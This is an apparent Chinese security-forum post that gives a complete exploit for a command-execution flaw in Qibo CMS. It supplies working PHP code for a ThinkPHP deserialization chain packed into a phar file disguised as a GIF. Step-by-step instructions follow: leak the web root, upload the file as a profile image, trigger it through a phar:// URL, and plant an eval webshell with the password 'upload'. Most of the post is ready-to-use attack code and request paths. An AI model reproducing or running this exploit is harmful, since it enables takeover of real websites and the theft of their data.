[齐博CMS系统存在命令执行漏洞]

漏洞利用过程:

1 首先爆出网站跟路径:

访问:

/index.php/cms/1

会在debug里看到网站根路径! 如果开了debug的话!

然后根据网站根路径修改poc! 看poc里的注释!

2 利用poc生成 phar文件

poc

<?php
namespace think\process\pipes {
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
        }
    }
}

namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  //$this->parent=> think\console\Output;
            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error
            $this->error = $modelRelation;               // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\model\relation{
    class HasOne extends OneToOne {

    }
}
namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    //$query指向Query
            $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
        }
    }
}

namespace think\db {
    class Query {
        protected $model;

        function __construct($model)
        {
            $this->model = $model; //$this->model=> think\console\Output;
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; //$handle->think\session\driver\Memcached
        }

    }
}
namespace think\session\driver {
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            $this->handler = $handle; //$handle->think\cache\driver\File
        }
    }
}

namespace think\cache\driver {
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                //'path'  => '1111.php',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php',   //win

                /*/phpstudy_pro/WWW/aaa/x1/public/b.php   /phpstudy_pro/WWW/aaa/x1/是网站根路径,要根据不同服务器进行替换!  /public/b.php是webshell的位置 */

                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }

    }
}

namespace {
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
//    echo urlencode(serialize($window));


    $o = $window;
    $filename = '2.phar';// 后缀必须为phar,否则程序无法运行
    file_exists($filename) ? unlink($filename) : null;
    $phar=new Phar($filename);
    $phar->startBuffering();
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o);
    $phar->addFromString("foo.txt","bar");
    $phar->stopBuffering();
}

3 生成phar文件 将后缀改成gif!

访问 会员中心:

点击修改个人资料:

用burp抓取 文件上传路径:

5 再访问下面url写入webshell

/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif

后面是刚刚上传的gif文件!

访问完成后,即可在网站目录下生成webshell.

6 访问webshell

/public/b.php12ac95f1498ce51d2d96a249c09c1998.php

shell写入成功! 密码是upload

总结

一直挖洞一直爽!

点击收藏 | 2 关注 | 1 打赏
登录 后跟帖